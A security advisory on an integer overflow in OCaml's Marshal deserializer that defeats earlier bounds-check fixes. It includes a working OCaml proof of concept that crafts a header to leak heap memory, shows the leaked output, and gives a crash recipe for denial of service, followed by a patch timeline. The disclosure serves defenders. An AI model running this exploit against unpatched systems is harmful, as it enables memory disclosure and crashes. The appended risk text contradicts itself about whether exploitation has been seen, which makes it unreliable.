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OSEC-2026-18
An integer overflow in the length-validation logic of OCaml's Marshal deserializer allows a crafted serialized object to bypass all bounds checks added by the CVE-2026-28364 fix, producing heap out-of-bounds reads from Marshal.from_bytes / Marshal.from_string (and the C API caml_input_value_from_block).
Root cause
runtime/intern.c validates declared data length against the input buffer with unsigned 64-bit addition that can wrap:
/* caml_input_val_from_bytes, intern.c:1038 */
if (ofs + h.header_len + h.data_len > caml_string_length(str))
caml_failwith("input_val_from_string: bad length");
h.data_len is fully attacker-controlled (8-byte field read straight from the stream for Intext_magic_number_big). With data_len >= 2^64 - (ofs + h.header_len), the sum wraps to a small value and the check passes.
The CVE-2026-28364 fix introduced:
/* intern.c:1043 (added by the fix) */
s->intern_src_end = s->intern_src + h.data_len; /* wraps to a pointer BEFORE the buffer */
intern_src_end wraps to a location before intern_src, so every intern_check_read() bound added by the fix (len > end - src with a negative diff promoted to a huge uintnat) evaluates false for any realistic length. The parser (intern_rec) then honors attacker-controlled read lengths (readblock up to Max_wosize bytes) against memory far beyond the input buffer.
The OCaml-side wrapper validation in stdlib/marshal.ml is bypassed by the same wrap, via caml_marshal_data_size (intern.c:1116-1150):
return Val_long((header_len - 16) + data_len); /* wraps to 0 / negative */
Marshal.from_bytes (marshal.ml:55-62) calls data_size_unsafe first, gets a wrapped len (0 or negative), and its re-check ofs > Bytes.length buff - (header_size + len) passes.
The same unchecked wrap exists in caml_input_value_from_buffer (intern.c:1080), used by the public C API caml_input_value_from_block and caml_input_value_from_malloc - these have no OCaml-side validation at all.
Exploit path
- Craft 32-byte header:
Intext_magic_number_big+ 4 padding bytes +data_len = 2^64 - 16+num_objects = 0+whsize = 0. - Append a valid object code byte stream (e.g., a "small string" code
0x3F= 31 bytes, orCODE_STRING32with an arbitrary length). - Call
Marshal.from_bytes buf 0(orMarshal.from_string). data_size_unsafereturns 0; OCaml-side check passes.- C-side check
0 + 32 + (2^64-16) = 16 > lenpasses (wrapped). intern_src_endwraps tobuf + 16; allintern_check_readpass.intern_recexecutesreadblock(s, dest, len)with attacker-chosenlen,memcpy-ing heap memory past the buffer end into the returned string (info leak), or a hugelen(SIGBUS/SIGSEGV, DoS).
Proof of concept
Tested on: macOS arm64, OCaml 5.5.0 (Homebrew), ocamlopt.
1. Heap information disclosure (clean, no crash)
let () =
let buf = Bytes.create 40 in
Bytes.set buf 0 (Char.chr 0x84); Bytes.set buf 1 (Char.chr 0x95);
Bytes.set buf 2 (Char.chr 0xa6); Bytes.set buf 3 (Char.chr 0xbf);
for i = 4 to 7 do Bytes.set buf i '\000' done;
for i = 8 to 15 do Bytes.set buf i '\xff' done;
Bytes.set buf 15 (Char.chr 0xf0); (* data_len = 2^64 - 16 *)
for i = 16 to 31 do Bytes.set buf i '\000' done; (* num_objects = whsize = 0 *)
Bytes.set buf 32 (Char.chr 0x3f); (* small string, len 31 *)
for i = 33 to 39 do Bytes.set buf i 'A' done; (* only 7 real bytes follow *)
let s : string = Marshal.from_bytes buf 0 in
Printf.printf "len=%d content=%S\n" (String.length s) s
Output (24 bytes past the 40-byte buffer leaked into the returned string):
len=31 content="AAAAAAA\000\000\000\000\000\000\007\000\b\000\000\000\000\000\000\152\018\001\003\001\000\000\000"
2. Denial of service (crash)
Same header; stream byte 32 = 0x0A (CODE_STRING32), big-endian 0x40000000 (1 GB) length, 37-byte buffer:
$ ./crash; echo "exit=$?"
exit=138 (128 + SIGBUS)
Timeline
- 2026-08-15: report to security@ocaml.org
- 2026-08-25: patch developed
- 2026-09-03: patch merged into trunk, 5.5, and 4.14 branches
- 2026-09-05: release of OCaml 5.5.1
- 2026-09-10: advisory published
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The vulnerability requires local access to the device to be exploited. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a high impact on the confidentiality of the information. There is a low impact on the integrity of the data.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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